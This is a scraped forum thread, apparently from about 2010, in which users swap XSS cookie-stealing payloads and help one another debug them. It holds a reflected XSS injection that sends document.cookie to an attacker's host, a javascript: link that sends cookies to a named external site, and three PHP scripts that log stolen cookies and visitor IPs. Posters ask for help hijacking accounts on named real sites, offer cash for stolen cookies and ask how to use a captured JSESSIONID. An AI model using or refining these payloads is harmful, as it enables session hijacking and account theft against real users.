The script that you are trying is wrong. Try this: http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http://yoursite.com/cookiestealer?c=" + document.cookie</script>
Thank you for your timely responses. After using that code I am now getting the information and the cookie logged properly. however the page still does not redirect. I am using firefox 3.5.7 I don't know if that makes any difference.
if i want test this script on myself what should i do? (logging in a forum or test that in firefox or ie?)
i tried to make one regarding on the tut but mine is not workin can you help me plsss i add you in my yahoo inocentjacky is my yahoo ID plssss
i dont understand something... for example if i put this cod as a index page <a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+ document.cookie)">Click Me</a> and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job i guess i do something wrong because none of them works. below are the stealer script that i use: 1 HTML: <?php $cookie = $_GET['cookie']; $log = fopen("log.txt", "a"); fwrite($log, $cookie ."\n"); fclose($log); ?> 2 HTML: <?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); echo '<b>Page Under Construction</b>' ?> 3 HTML: <?php $cookie = $_GET['c']; $ip = getenv (‘REMOTE_ADDR’); $date=date(“j F, Y, g:i a”);; $referer=getenv (‘HTTP_REFERER’); $fp = fopen(‘cookies.html’, ‘a’); fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’); fclose($fp); header (“Location:TechMafias”); ?> Please help me...my account on a web site was stolen and i want to get it back.
i have changed the host but stil dosent work...i get something like this HTML: IP: 92.83.149.140 | PORT: 25710 | HOST: | Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.25 Safari/532.5 | METHOD: | REF: h t t p ://extra-ratie.hi2.ro/ | DATE: Saturday 26th 2010f June 2010 11:54:17 PM | COOKIE: cookie= the script dosent "steal" the cookie... Can someone give me a good script?...i want to send the link that victim will acces via PM.
this code is completely out of work!!! it didnt work for me. i think its better to forget about stealing cookie..i couldnt find useful codes anywhere
i will keep searching until i will found a good XSS cookie stealer script...and i will post it here when i will found it. thanks for help
for example if i put this cod as a index page <a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+ document.cookie)">Click Me</a> and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job i guess i do something wrong because none of them works. below are the stealer script that i use: 1 HTML: <?php $cookie = $_GET['cookie']; $log = fopen("log.txt", "a"); fwrite($log, $cookie ."\n"); fclose($log); ?> 2 HTML: <?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); echo '<b>Page Under Construction</b>' ?> 3 HTML: <?php $cookie = $_GET['c']; $ip = getenv (‘REMOTE_ADDR’); $date=date(“j F, Y, g:i a”);; $referer=getenv (‘HTTP_REFERER’); $fp = fopen(‘cookies.html’, ‘a’); fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’); fclose($fp); header (“Location:TechMafias”); ?> Please help me...my account on a web site was stolen and i want to get it back.
Does anybody know where my code doesn't work? It displays everything but the cookie. The site is kind of trick but it allows and .. which translates into html code as <img src=""></img> and <a href=""></a>. My PHP: 1 HTML: <?php $cookie =$HTTP_GET_VARS["cookie"]; $date = date ("l ds of F Y h:i:s A"); $ip = $_SERVER['REMOTE_ADDR']; $file = fopen('log.txt', 'a'); fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie \n"); fclose($file); ?> I've tried many different modifications on the site. For example,
I can't understand how this forum works properly lol. The website is crossfire.nu is that helps anybody. Posts are done via UBBcode. I hope somebody can help. Indianman, tenu punjabi aandi ah?
So if somebody can tell me the problem it would be really nice .. anybody that is willing to help me and can help me steal cookies of this site will receive a cash reward aswell :P
admin , i want to hack a lineage 2 website and log as administrator . Is that possible? pls reply Thx.
sir my log.txt file contains only JSESSIONID=some value; can u pls tell me what to do with JSESSIONID.